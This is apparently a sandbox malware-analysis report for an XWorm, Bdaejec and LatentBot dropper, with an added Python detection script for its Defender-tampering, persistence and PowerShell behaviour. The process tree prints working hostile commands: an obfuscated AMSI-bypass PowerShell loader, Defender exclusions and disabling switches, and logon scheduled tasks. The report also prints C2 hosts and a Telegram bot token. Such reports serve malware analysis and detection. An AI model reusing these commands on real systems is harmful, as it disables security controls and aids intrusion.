Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20250502-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    20/05/2025, 00:46

General

  • Target

    250519-z3llfszks4.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as real-time monitoring, block at first sight, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is a backdoor written in C++.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs

    Uses a powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
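
The Defender-tampering, scheduled-task and PowerShell signatures above map to concrete command lines in this report's process tree (Add-MpPreference -ExclusionPath, Set-MpPreference -Disable* $true, schtasks /Create /SC ONLOGON /RL HIGHEST into %AppData%, and a powershell.EXE spawned by the Schedule service host). The following is an added example, not part of the sandbox report or of any vendor rule set: detection logic a SOC would run over process-creation telemetry. The event records are constructed from the command lines on this page (PID 1408's script abridged to its tail) plus one invented benign control; the rule names and thresholds are my own.

```python
"""Process-creation detection logic for the behaviours the signatures above
describe. Added example: the event records below are constructed from the
command lines in this report's process tree, plus one benign control; rule
names and thresholds are my own."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_cmdline: str


# Rule 1: Set-MpPreference -Disable<X> $true or Add-MpPreference -ExclusionPath.
_MP_TAMPER = re.compile(
    r"(?:Set|Add)-MpPreference\s+(?:-Disable\w+\s+\$true|-ExclusionPath\b)",
    re.IGNORECASE)

# Rule 2: schtasks /Create that runs at logon with highest privileges and
# whose action lives under a user-writable AppData path.
_SCHTASKS_PERSIST = re.compile(
    r'schtasks(?:\.exe)?"?\s+.*?/Create\b'
    r'(?=.*?/SC\s+ONLOGON\b)(?=.*?/RL\s+HIGHEST\b)'
    r'(?=.*?/TR\s+"?[^"]*\\AppData\\)',
    re.IGNORECASE)

# Rule 3: PowerShell whose parent is the Schedule service host and whose
# script resolves native functions and loads an assembly in memory.
_SCHEDULE_PARENT = re.compile(r"svchost\.exe\s.*-s\s+Schedule\b", re.IGNORECASE)
_INMEM_MARKERS = ("GetDelegateForFunctionPointer",
                  "[Reflection.Assembly]::Load(",
                  ".EntryPoint.Invoke(")
_CHAR_CAST = re.compile(r"\[Char\]\(\d+\)")


def evaluate(ev: ProcEvent) -> list[str]:
    """Names of the rules this event matches; empty for benign events."""
    hits = []
    if _MP_TAMPER.search(ev.cmdline):
        hits.append("defender_tamper")
    if _SCHTASKS_PERSIST.search(ev.cmdline):
        hits.append("schtasks_logon_highest")
    if (ev.image.lower().endswith("powershell.exe")
            and _SCHEDULE_PARENT.search(ev.parent_cmdline)):
        markers = sum(m in ev.cmdline for m in _INMEM_MARKERS)
        # Two of three in-memory loading markers, or a script built from
        # twenty or more [Char](N) casts, is enough to alert (threshold mine).
        if markers >= 2 or len(_CHAR_CAST.findall(ev.cmdline)) >= 20:
            hits.append("scheduled_ps_inmemory_load")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """PID -> rule hits for every alerting event; silent PIDs are omitted."""
    return {ev.pid: hits for ev in events if (hits := evaluate(ev))}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r'"C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"'
SCHEDULE_SVC = r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"
BAT_RUNNER = (r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local'
              r'\Temp\8C42.tmp\8C43.tmp\8C44.bat C:\Users\Admin\AppData\Roaming'
              r'\x69Disable-winDefender.exe"')

# Sample events (constructed from the process tree; PID 1408's script is
# abridged to its tail, PID 9001 is an invented benign control).
EVENTS = [
    ProcEvent(1180, PS, '"' + PS + "\" -ExecutionPolicy Bypass Add-MpPreference "
              r"-ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'", DROPPER),
    ProcEvent(4008, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON '
              r'/TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST', DROPPER),
    ProcEvent(4152, PS, r'powershell.exe -command "Set-MpPreference '
              r'-DisableRealtimeMonitoring $true"', BAT_RUNNER),
    ProcEvent(1408, PS[:-3] + "EXE",
              r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function '
              r'Local:MVKPIfBtMWRx{...}...[Runtime.InteropServices.Marshal]::'
              r'GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf)'
              r'.Invoke($JjvGvEePuwNbBqKyn,[uint32]8,0x20,[ref]$BUYxZhNXwZ);'
              r"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine"
              r".OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+'R'+[Char](69)+'')"
              r".GetValue(''+[Char](120)+''+[Char](54)+''+[Char](57)+''+'s'+''+[Char](116)"
              r"+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+''))"
              r'.EntryPoint.Invoke($Null,$Null)"', SCHEDULE_SVC),
    ProcEvent(1536, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes", ""),
    ProcEvent(9001, PS, r'powershell.exe -command "Get-MpPreference"', SCHEDULE_SVC),
]

if __name__ == "__main__":
    for pid, rules in triage(EVENTS).items():
        print(pid, ", ".join(rules))
```

Rule 3 keys on the parent being the Schedule service host rather than on schtasks.exe itself, because the task was registered by an earlier process and the only thing visible at execution time is svchost -s Schedule spawning PowerShell; the marker count and the [Char] threshold are deliberately conservative so a plain Get-MpPreference launched by a legitimate task does not fire.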

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{59a02824-c996-495a-a3bb-0d0aef5ec34f}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:744
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1028
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1108
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1172
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                         C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MVKPIfBtMWRx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JSPZKwpHVeqSXx,[Parameter(Position=1)][Type]$jjPceJbftj)$uDkKYAhAQbC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+'g'+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$uDkKYAhAQbC.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$JSPZKwpHVeqSXx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');$uDkKYAhAQbC.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+'o'+[Char](116)+''+','+''+[Char](86)+'ir'+[Char](116)+'ua'+[Char](108)+'',$jjPceJbftj,$JSPZKwpHVeqSXx).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'nag'+[Char](101)+''+'d'+'');Write-Output $uDkKYAhAQbC.CreateType();}$CzlBVZNNSzOuQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in32.'+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$snQizwzteddOkc=$CzlBVZNNSzOuQ.GetMethod(''+'G'+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JhVzOlVkXFqTcTVCqXc=MVKPIfBtMWRx @([String])([IntPtr]);$ocDMZvbhOPeJKYGXuVrEyf=MVKPIfBtMWRx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UKEUneCuLbV=$CzlBVZNNSzOuQ.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'l'+'l'+'')));$FyEjhXWLyFHIWH=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+'y'+'A'+'')));$ieCZrJiapcTQeFbKO=$snQizwzteddOkc.Invoke($Null,@([Object]$UKEUneCuLbV,[Object]('V'+'i'+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oeMfxAC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FyEjhXWLyFHIWH,$JhVzOlVkXFqTcTVCqXc).Invoke('a'+'m'+'s'+[Char](105)+'.'+'d'+''+[Char](108)+'l');$JjvGvEePuwNbBqKyn=$snQizwzteddOkc.Invoke($Null,@([Object]$oeMfxAC,[Object]('A'+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'a'+[Char](110)+'B'+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$BUYxZhNXwZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,4,[ref]$BUYxZhNXwZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JjvGvEePuwNbBqKyn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ieCZrJiapcTQeFbKO,$ocDMZvbhOPeJKYGXuVrEyf).Invoke($JjvGvEePuwNbBqKyn,[uint32]8,0x20,[ref]$BUYxZhNXwZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1408
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:5336
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:1560
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:2392
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1188
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1252
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1296
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1328
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1436
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2592
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1448
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1524
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1536
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1656
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1680
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1736
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1772
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1816
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1884
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1892
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1976
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1848
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2148
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2212
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2268
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2428
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2436
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2652
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of UnmapMainImage
                                                                      PID:2704
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2776
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2800
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2812
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2828
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3004
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3092
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3500
                                                                                  • C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:884
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1180
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:4008
                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5488
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4424
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:724
                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1640
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C42.tmp\8C43.tmp\8C44.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:5532
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4152
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1628
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2032
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3900
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5620
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3924
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
